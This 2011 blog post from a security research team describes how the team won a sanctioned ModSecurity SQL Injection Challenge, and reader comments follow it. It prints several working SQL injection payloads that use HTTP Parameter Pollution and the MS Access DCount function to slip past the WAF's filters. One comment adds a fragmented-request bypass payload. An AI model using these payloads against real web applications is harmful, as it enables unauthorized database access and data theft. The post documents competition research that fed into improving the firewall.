Wednesday, July 6, 2011

Positive Research helps to improve Web Appliaction Firewall efficiency

Positive Research, the innovative department of Positive Technologies, deserves thanks from Trustwave, WAF ModSecurity developers for Web Application Firewall research.

On 23th of June, Trustwave, Web Application Firewall ModSecurity developer, held open competition in testing of web application protection means. SQL Injection Challenge competitors should bypass ModSecurity filter rules that block SQL Injection attacks.

The testing consisted of two stages. At the first stage, competitors should exploit SQL Injection to get data from database of test sites. The second task was more complicated: the task was the same but competitors should bypass ModSecurity filter rules and do not generate firewall events.

ModSecurity SQL Injection Challenge attracted attention of a great number of researchers, including experts of Positive Technologies innovative department - Positive Research.
The experts are usually interested in protection means. Thus, Dmitry Evteev, Positive Research expert, suggested a universal technique how to bypass ModSecurity filtering ( in 2009. New ModSecurity version design uses the ideas.

Positive Research experts successfully managed all tasks and bypassed WAF ModSecurity restrictions with the up-to-date filter rules. The developers are going to use the results to improve firewall efficiency.

Alexander Anisimov, Positive Research team leader remarks: «Web Application Firewall protects the most part of web applications from mass attacks. But our penetration testing clearly shows that Web Application Firewall version «form the box» is unable to protect systems from a great number of targeted attacks. So we believe the best way is to use WAF to eliminate detected vulnerabilities. The possible solution is to integrate compliance and vulnerability management system MaxPatrol and Web Application Firewall ModSecurity».
More details about the competition are available here:


ModSecurity SQL Injection Challenge held by ModSecurity Team, start on 23th, June. Participants could enjoy the process, organizers could get valuable information to improve WAF ModSecurity rules. The event included two levels– Level 1 : Speed Hacking (completed) and Level 2: Filter Evasion (is always open). Every participant should exploit one of web sites protected by WAF ModSecurity and provide organizers with database structure and certain table contents to complete the level. Test servers of Acunetix, HP, IBM, Cenzic security scanners acted as vulnerable web sites.

The participants should provide organizers the above-listed data and details how to get them to complete the level 1. And only then you got access to ModSecurity. This is Speed Hack itself. So, by the evening 24th of June there were no chance to have any uncompleted stages on the level 1. But, surprisingly, the participants completed level 1 only for web sites that were not hacked by the evening 24th of June. PT Research Team members easily exploit the detected SQL Injections that use MSAccess. Not long after, organizers confirmed us as level 1 winners, then level 1 was closed as everything was hacked. According to organizers, they processed about 500 solutions, but no one was able to exploit SQL Injection vulnerability in MS Access database. We think the reason is its unpopularity =)

Then we try to solve problem 2: exploit SQL Injection to bypass up-to-date WAF ModSecurity rules. We decide to use the method from the first stage – exploit vulnerability on the IBM test site (IIS + ASP + MsAccess).

To bypass WAF we use MS Access operators and the features of IIS and ASP association that allows us to conduct HTTP Parameter Pollution attack.

We exploit SQL Injection vulnerability in test site script transaction.asp. User input is insufficiently controlled in the server script that allows attackers to conduct SQL Injection.
Below you can find requests that are not detected by ModSecurity and allow you to get all necessary data to connect to web site database.

A crafted SQL request that addresses evidently defined database, is enough to get database name. Error-based method with bruteforce technique was used to find existed databases via requests with not existed database name. Web application responses with MS Access error which indicates that the database does not exist.
Here is an example:

__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from a.c)&before=2—1

We use the same method to get table titles from the current database but requests do not include evident database name.
Here is an example:

__VIEWSTATE=[skipped]&after=1 and (select 1&after=1 from users1)&before=2—1

Bruteforce also helps to get column names, but we also use error-based method and “group by + having 1” structure. We conduct HTTP Parameter Pollution attack to bypass ModSecurity.
Here is an example:

__VIEWSTATE=[skipped]&after=&before=1231 group by 1&before=transid having 1

We have to spend rather much time to get data from the database :) ModSecurity filter blocks almost all useful functions. But we find the solution!
First of all, we create a special statement that allows us to detect data in database. Here is the request:

__VIEWSTATE=[skipped]&after=1 AND (select username from users where username='admin')&before=d

Of course, WAF detects the statement. Top prevent it, we divide the request (select username from users where username=’user’) into several vulnerabilities.
For example:

__VIEWSTATE=[skipped]&after=1 AND (select mid(last(username)&after=1&after=1) from users where username='admin') &before=d

It works but WAF filters it: exactly “mid(“ and similar character sets. We found DCount function in MSAccess manual that together with WAF allows us to exploit the vulnerability and bypass WAF. Here is an example:

__VIEWSTATE=[skipped]&after=1 AND (select DCount(last(username)&after=1&after=1) from users where username='ad1min')&before=d

You can get database data via bruteforce.

Greets goes out to Ahmad Maulana, Travis Lee, Johannes Dahse, Vladimir Vorontsov, Roberto Salgado, SQLMap Developers, HackPlayers, Alexander Zaitsev, Yuri Goltsev.


  1. I used almost the same approach to winning this contest.
    Only instead of the HPP was used fragmented request.

  2. Vladimir, can you show an example of your request to get data from database and bypass waf?

  3. The resulting SQL was about:

    ... WHERE DateTo=''and(select(ord(username),'AND DateTo='from users#

    Payload1: 'and(select(ord(username),
    Payload2: from users#

    Something like that. Approx.
    Main point is to not use extra quotes, and take those that are already in the query

  4. Nicely done!

    Miroslav and I (sqlmap developers) focused on the Acunetix application (Apache/PHP/MySQL5.0) only because HPP was already fixed by the ModSecurity guys at the time we gave it a go to the challenge.

  5. Bernardo, thanks! And whats about your solution? How do you guys bypass WAF?

  6. We abused MySQL syntax flexibility as well as its comments. We are going to give out the details on my blog and on the sqlmap mailing list soon

  7. Excellent pieces. Keep posting such kind of information on your blog. I really impressed by your blog.
    SEO tools

  8. Lot of useful points are there. Its really keeps me updated.
    Vee Eee Technologies